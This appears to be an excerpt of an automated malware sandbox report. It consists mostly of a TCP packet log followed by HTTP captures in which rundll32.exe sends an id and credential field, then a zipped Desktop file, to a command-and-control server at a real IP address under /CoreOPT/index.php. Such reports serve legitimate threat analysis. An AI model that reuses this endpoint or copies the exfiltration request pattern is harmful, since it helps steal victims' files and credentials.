                                              Oct 26, 2024 19:14:06.771653891 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.771661043 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.771676064 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.771684885 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.771697998 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.771702051 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.771713018 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.771713018 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.771739006 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.771748066 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.771764040 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.771778107 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.771778107 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.771811962 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.771822929 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.771845102 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.771866083 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.771903038 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.771915913 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.771927118 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.771962881 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.771965981 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.771980047 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.771986008 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.771995068 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.772013903 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.772025108 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.772177935 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.772244930 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.772244930 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.772274017 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.772279978 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.772300005 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.772310972 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.772322893 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.772353888 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.772373915 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.772378922 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.772386074 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.772401094 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.772422075 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.772438049 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.772459984 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.772553921 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.772620916 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.772639990 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.772664070 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.772686005 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.772707939 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.772733927 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.772761106 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.772780895 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.772788048 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.772802114 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.772803068 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.772814035 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.772838116 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.772861004 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.772882938 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.772902966 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.772923946 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.772937059 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.772947073 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.772947073 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.772948980 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.772960901 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.772969007 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.772974968 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.772984982 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.773008108 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.773031950 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.773122072 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.773149014 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.773170948 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.773197889 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.773211956 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.773235083 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.773299932 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.773319960 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.773322105 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.773333073 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.773344040 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.773344994 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.773358107 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.773364067 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.773370028 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.773381948 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.773411036 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.773416042 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.773423910 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.773436069 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.773437977 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.773447990 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.773461103 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.773462057 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.773473024 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.773484945 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.773484945 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.773495913 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.773508072 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.773508072 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.773520947 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.773545980 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.773559093 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.773571014 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.773575068 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.773582935 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.773586035 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.773595095 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.773605108 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.773612022 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.773628950 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.773654938 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.773672104 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.773675919 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.773698092 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.773718119 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.773739100 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.773751020 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.773821115 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.773864031 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.773886919 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.773886919 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.773910999 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.773929119 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.773933887 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.773947001 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.773951054 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.773958921 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.773977041 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.773993969 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.774008989 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.774017096 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.774045944 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.774059057 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.774074078 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.774094105 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.774120092 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.774136066 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.774162054 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.774177074 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.774238110 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.774267912 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.774295092 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.774315119 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.774333954 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.774363995 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.774389029 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.774390936 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.774408102 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.774456024 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.774481058 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.774482965 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.774504900 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.774507046 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.774528027 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.774555922 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.774590015 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.774595976 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.774599075 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.774622917 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.774657965 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.774672985 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.774687052 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.774710894 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.774736881 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.774751902 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.774792910 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.774807930 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.774837017 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.774863005 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.774879932 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.774885893 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.774893045 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.774904013 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.774907112 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.775124073 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.775168896 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.775181055 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.775338888 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.775458097 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.775484085 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.775525093 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.775537968 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.775552034 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.775557041 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.775564909 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.775579929 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.775691986 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.775732040 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.775840998 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.775856018 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.776386023 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.776400089 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.776412010 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.776437044 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.776448965 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.776453972 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.776465893 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.776530981 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.776544094 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.776557922 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.776568890 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.776581049 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.776592016 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.776617050 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.776631117 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.776643038 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.776654959 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.776667118 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.776882887 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.776896000 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.776911020 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.776922941 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.776947975 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.776963949 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.777009010 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.777051926 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.777064085 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.777075052 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.777261019 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.777272940 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.777285099 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.777297020 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.777307987 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.777323008 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.777390003 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.777401924 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.777414083 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.777477980 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.777595997 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.777611017 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.777707100 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.777745008 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.777968884 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.777982950 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.777996063 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.778148890 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.778161049 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.778177023 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.778302908 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.778318882 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.778330088 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.778415918 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.778429985 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.778445959 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.778470993 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.778523922 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.778583050 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.779177904 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.779191017 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.779201984 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.779223919 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.779236078 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.779439926 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.779455900 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.779475927 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.779541016 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.779552937 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.779563904 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.779576063 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.779599905 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.779613018 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.779624939 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.779637098 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.779649019 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.779666901 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.779695988 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.779707909 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.779719114 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.779730082 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.779743910 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.779846907 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.779997110 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.780009985 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.780023098 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.780035019 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.780046940 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.780072927 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.780086040 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.780097961 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.780148029 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.780160904 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.780633926 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.780745029 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.780981064 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.781049967 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.781064034 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.781075001 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.781152964 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.781212091 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:07.256122112 CEST8049731185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:07.256614923 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:07.308695078 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:07.308806896 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:07.352469921 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:07.390486002 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:15.313879967 CEST4973280192.168.2.4185.215.113.217

                                              HTTP Request Dependency Graph

                                              • 185.215.113.217

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.449730185.215.113.217805356C:\Windows\System32\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Oct 26, 2024 19:13:43.940629959 CEST174OUTPOST /CoreOPT/index.php HTTP/1.1
                                              Content-Type: application/x-www-form-urlencoded
                                              Host: 185.215.113.217
                                              Content-Length: 21
                                              Cache-Control: no-cache
                                              Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d
                                              Data Ascii: id=246122658369&cred=
                                              Oct 26, 2024 19:13:44.968461037 CEST190INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Sat, 26 Oct 2024 17:13:44 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 1 0
                                              Oct 26, 2024 19:14:06.755256891 CEST170OUTPOST /CoreOPT/index.php?wal=1 HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=----NDYxMg==
                                              Host: 185.215.113.217
                                              Content-Length: 4772
                                              Cache-Control: no-cache
                                              Oct 26, 2024 19:14:06.755405903 CEST140OUTData Raw: 2d 2d 2d 2d 2d 2d 4e 44 59 78 4d 67 3d 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36
                                              Data Ascii: ------NDYxMg==Content-Disposition: form-data; name="data"; filename="246122658369_Desktop.zip"Content-Type: application/octet-stream
                                              Oct 26, 2024 19:14:06.755405903 CEST8OUTData Raw: 50 4b 03 04 14 00 00 00
                                              Data Ascii: PK
                                              Oct 26, 2024 19:14:06.755405903 CEST8OUTData Raw: 08 00 53 40 44 57 ba eb
                                              Data Ascii: S@DW
                                              Oct 26, 2024 19:14:06.755405903 CEST8OUTData Raw: bd 05 84 02 00 00 02 04
                                              Data Ascii:
                                              Oct 26, 2024 19:14:06.755458117 CEST8OUTData Raw: 00 00 17 00 00 00 5f 46
                                              Data Ascii: _F
                                              Oct 26, 2024 19:14:06.755458117 CEST8OUTData Raw: 69 6c 65 73 5f 5c 44 56
                                              Data Ascii: iles_\DV
                                              Oct 26, 2024 19:14:06.755484104 CEST8OUTData Raw: 57 48 4b 4d 4e 46 4e 4e
                                              Data Ascii: WHKMNFNN
                                              Oct 26, 2024 19:14:06.755502939 CEST8OUTData Raw: 2e 64 6f 63 78 15 93 49
                                              Data Ascii: .docxI
                                              Oct 26, 2024 19:14:06.755726099 CEST8OUTData Raw: 72 40 21 08 44 f7 a9 ca
                                              Data Ascii: r@!D
                                              Oct 26, 2024 19:14:06.755757093 CEST8OUTData Raw: a1 1c 3f 0e a8 88 e2 70
                                              Data Ascii: ?p
                                              Oct 26, 2024 19:14:07.308695078 CEST190INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Sat, 26 Oct 2024 17:14:07 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                              Data Ascii: 1 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.449731185.215.113.217805768C:\Windows\System32\rundll32.exe
                                              TimestampBytes transferredDirectionData
